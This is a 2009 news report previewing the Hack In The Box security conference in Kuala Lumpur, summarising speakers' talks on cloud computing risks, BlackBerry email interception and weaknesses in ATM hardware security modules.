KUALA LUMPUR, 5 OCTOBER 2009 – Cloud clobbering, ATM hacking and BlackBerry spying are some of the themes at the 7th Hack in The Box Security Conference ((HITBSecConf) in Malaysia.
Conference organisers said some of the most exciting mainstream and underground ICT security experts are in Kuala Lumpur, October 7-8, to discuss a range of relevant hardware and software security topics.
Sensepost technical director Haroon Meer said that his talk—Clobbering the Cloud—is an examination of the new technologies in, as well as the various risks and vulnerabilities of the new systems behind Cloud Computing,
ZenConsultant head of research and development, Sheran Gunasekera, said that while the BlackBerry has always enjoyed a reputation for being a secure platform without a single vulnerability reported on it for the past two years, he will show how the handhelds can be compromised to sniff user’s email (and optionally instant messages, web browsing traffic, and SMS messages).
Hack In The Box (HITB) is the owner and organiser of HITBSecConf, the largest network security conference in Asia and the Middle East. HITBSecConf has been held in Malaysia since 2003 and is endorsed by the Malaysian Communications and Multimedia Commission (MCMC), the Malaysian International Chamber of Commerce and industry (MICCI), the Malaysian National Computer Confederation (MNCC) and the Malaysian Multimedia Development Corporation (MDeC).
ATM vulnerabilities
Other speakers include ENCODE Middle East managing director, Dimitrios Petropoulos, who said: “The cornerstone of every bank’s ATM network is a number of HSMs [Hardware Security Modules], which securely create, store, verify, translate and ultimately destroy the verification PINs [Personal Identification Numbers] associated with each debit/credit card.”
“However, the protocols used and the APIs [Application Programming Interface] exposed by the HSMs are known to suffer from a number of inherent vulnerabilities that open the system to a wide range of attacks, from the trivial to highly complex, all of which lead to the same result—the unauthorised disclosure of large numbers of client PINs,” said Petropoulos, adding that he would give examples of some successful recent attacks perpetrated using the described vulnerabilities.
